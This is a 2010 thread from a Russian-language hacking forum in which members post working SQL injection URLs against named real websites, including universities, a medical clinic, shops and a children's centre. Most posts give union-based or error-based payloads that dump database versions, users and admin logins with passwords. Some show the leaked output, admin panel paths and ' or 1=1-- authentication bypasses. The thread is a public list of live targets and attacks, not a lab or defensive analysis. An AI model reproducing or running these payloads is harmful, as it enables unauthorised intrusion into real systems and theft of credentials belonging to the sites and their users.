SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.fsts.ac.ma/fsts/listeannuaires.php?idrubrique=-11+and+1=2+union+select+1,concat(@@version,0x20,user(),database(),0x20,@@version_compile_os),3,4,5,6,7,8,9,10,11,12--

    5.1.47 root@localhostouahainf_fsts redhat-linux-gnu
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.coralclubes.com/informacion_general.php?id=02+and+1=0+union+select+1,group_concat(username,char(58),password),3,4,5,6,7+from+admin_usuarios

    http://www.maranathafc.tg/template.php?page=detail_infos&id=432+and+1=2+union+select+1,group_concat(login,char(58),password),3,4,5,6+from+user

    http://www.eortologio.gr/data/bios.php/?id=614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+msysaccessobjects

    http://wellunic.hu/content.php?id=19;select+version()::int,2+from+pg_user--

    http://elizabethnardo.hu/index.php?mode=menyasszony_hirek&cikk_id=95+and+1=0+union+select+1,2,3,concat_ws(0x3a,h_name,h_passw),5,6,7,8+from+hirlevel

    http://rugs.hu/?pg=product&id=1469'+or+(1,1)=(select+count(0),concat((select+concat(substring(nick,1,64),char(58),substring(pass,1,64))+from+admin+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    http://letoltokozpont.hu/letoltes_programok_reszletes.php?a=2546+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+%20&k=11
    ------------------------

    SQLite

    http://www.citytv.hu/musor_reszletezo.php?fk=17&mk=833&ms=1600&dt=20101114+union+select+sqlite_version()-- (вывода нет, так как одна калонка,и его не видать)

    обход авторизации форума

    http://www.citytv.hu/musor_reszletezo.php

    username - admin' or 1=1--
    password - любой пасс
     
    _________________________
    #13362 Konqi, 14 Nov 2010
    Last edited: 14 Nov 2010
  3. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    http://www.foto2web.ru/category-views.php?cat_id_name=6+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16+--+

    5.0.90:foto2web@localhost:foto2web



    http://bestin-art.ru/view_desktop.php?cat=15'+and+1=0+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9+--+

    5.1.36 :bestin@localhost:bestin
     
  4. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://hottur.org.ua/infrastruktura.php?id=-22+union+select+1,2,concat_ws%280x3a,login,password%29,4+from+auth--
    /admin/admin.php
    Смотрите портфолио разработчика. Почти все сайты уязвимы :eek:
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Сборочка

    finexshop.ru тИЦ — 10 PR — 4
    Code:
    http://www.finexshop.ru/isp.php?iid=-121815+union+select+111,database()+--+&page=1&goods=397722
    secure.pratt.duke.edu
    Code:
    http://secure.pratt.duke.edu/pratt_press/web.php?sid=169&iid=-20'+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11+from+10ch.users+--+
    transport-industry.com тИЦ — 10 PR — 4
    Code:
    http://www.transport-industry.com/distributors-ru.html?&L=5&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=63294a3162
    durlach.dlrg.de PR — 1
    Code:
    http://durlach.dlrg.de/gr/verein/termine/termine-detail.html?tx_dlrgterminkalender_pi1%5Baction%5D=read&tx_dlrgterminkalender_pi1%5Btid%5D=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16+--+&cHash=4ccffcd4fab1dcc4c3bbe3a3882a18d5
    songhai.org тИЦ — 10 PR — 5
    Code:
    http://www.songhai.org/index.php?option=com_content&view=article&id=82+union+select+user(),222,333+--+:commercialisation&catid=60':commercialisation
    uniklinik-ulm.de тИЦ — 10 PR — 6
    Code:
    http://www.uniklinik-ulm.de/service/aktuelles/veranstaltungen/teaser-detailansicht.html?eventid=-441+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+&cHash=6904a6d892
    apostolic.edu тИЦ — 10 PR — 3
    Code:
    http://www.apostolic.edu/download.php?cmd=detail&&startLib=-00000000000000000000000000000000000000000000000030'+union+select+1,group_concat(table_name),3+from+information_schema.tables+group+by+table_schema+--+&startCat=00000000000000000000000000000000000000000000000180&fid=00000000000000000000000000000000000000000000003007
    math.niu.edu тИЦ — 50 PR — 6
    Code:
    http://www.math.niu.edu/grad/index.php?cmd=detail&id=-480'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_Ws(0x3a3a,uname,pwd,super),24,25,26,27,28+from+inventory.users+--+
    mrbunker.ru тИЦ — 40 PR — 4
    Code:
    http://www.mrbunker.ru/index.php?id=2&nid=-60+UNioN/**/+/**/SElEct+1,2,3,4,5,group_concat(table_name),7,8,9,10+from+information_schema.tables+--+
    samjicorp.co.kr
    Code:
    http://www.samjicorp.co.kr/bbs/view.html?id=-31521+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13+--+
    hgn.de тИЦ — 10 PR — 3
    Code:
    http://www.hgn.de/index.php?inhalt=Presse&id=-369'+union+select+1,2,3,4,concat_ws(0x3a3a,admin,vorname,nachname,email,passwort)+from+user+--+
    pcsoft.de тИЦ — 10 PR — 4
    Code:
    http://www.pcsoft.de/?id=glossar&L=1&tx_a21glossary%5Buid%5D=63+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*+&tx_a21glossary%5Bback%5D=36&cHash=4f53095717
     
    3 people like this.
  6. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.autovirag.dp.ua/product_by_kind.php?id=-62+unIon+select+1,2,version%28%29,4--
     
    1 person likes this.
  7. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    harpandaltar.com
    PR 5
    Code:
    http://www.harpandaltar.com/interior.php?t=s&i=3&p=26&e=-48+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
     
  8. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Code:
    http://www.quadrantkindercentra.nl/kind.php?id=2+union+select+1,2,3,concat_ws(0x2f,UserName,UserPass,UserEmail),5,6,7,8,9+from+users+limit+1,1--
    admin_quadrant@localhost/5.1.52-community-log/admin_quadrant

    Вывод в заголовке.


    =============


    Code:
    http://www.waltonspianos.com/products/kind.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2f,version(),user(),database())--
    5.0.83-log/[email protected]/waltonsp_db

    =============


    Code:
    http://www.gitaristu.ru/bands/name.php?id=4+union+select+concat_ws(0x2f,username,user_password),2,3,4,5+from+phpbb_users+limit+1,1--

    5.1.52/gitaristu@localhost/gitaristu
     
    #13368 DeepBlue7, 16 Nov 2010
    Last edited by a moderator: 18 Nov 2010
    3 people like this.
  9. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    lee.edu
    PR - 6
    Code:
    http://www.lee.edu/ce/news_descr.asp?ID=-55+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
     
  10. ra0cg

    ra0cg Elder - Старейшина

    Joined:
    9 Nov 2008
    Messages:
    809
    Likes Received:
    500
    Reputations:
    200
    Code:
    http://www.novo-med.ru/index.php?id=2+and+1=0+UNION+SELECT+1,concat_ws(0x3a,database(),user(),version()),3,4,5--
     
    #13370 ra0cg, 18 Nov 2010
    Last edited: 18 Nov 2010
    1 person likes this.
  11. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Code:
    http://www.signal-doroga.ru/produkt_view.php?id=20100+union+select+1,2,3,4,5,concat(user(),0x2f,database(),0x2f,version()),7,8,9,10--

    user:[email protected]
    db:u69347
    ver:5.0.90-log
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.americatravel.ru/index.cfm?pid=116&cid=28+and+1=@@version
     
    _________________________
    1 person likes this.
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://yahoo.firemoto.ru/bid.php?id=j66010243%27+and+1=@@version--+

    Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    2 people like this.
  14. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    ....

    //// http://forum.xaknet.ru/showpost.php?p=37821&postcount=82

    Боян
     
    #13374 heks, 21 Nov 2010
    Last edited by a moderator: 21 Nov 2010
  15. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    http://www.truvor.ru/news.php?id_new=91+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9


    5.0.26-lk-log:truvorru_coffee@localhost:truvorru_coffee
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.distromania.com/distro_info.php?distro=620+and+1=(select+first+1+rdb$relation_name+from+rdb$relation_fields)--

    Firebird

    обход авторизации

    username - ' or 1=1--
    password - любой пасс
     
    _________________________
    #13376 Konqi, 22 Nov 2010
    Last edited: 22 Nov 2010
    1 person likes this.
  17. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    http://www.best-tel.ru/page.php?id=-4+UNION%20SELECT%20group_CONCAT%28id,0x3a,login,0x3a,passw%29,2%20FROM%20users--+
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.fermatta.edu.mx/vernoticia.php?idnew=98768+and+1=0+union+select+1,concat(username,char(58),pass),3,4,5,6,7,8,9+from+users1

    http://www.ifodes.edu.mx/index.php?op=34+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--
     
    _________________________
    #13378 Konqi, 24 Nov 2010
    Last edited: 24 Nov 2010
    1 person likes this.
  19. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://eliru.ru/articles.php?action=view&art=37+and+1=0+union+select+1,concat_ws%280x3a,login,pass%29,3,4,5,6,7,8,9+from+mse_users--

    Админка
    Code:
    http://eliru.ru/admin
     
    #13379 TreV@N, 24 Nov 2010
    Last edited: 24 Nov 2010
  20. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://tk-sevntu.org.ua/articles_view.php?id=-401+union+select+concat_ws%280x3a,login,password%29,2,3,4,5+from+adminlist--
     
Thread Status:
Not open for further replies.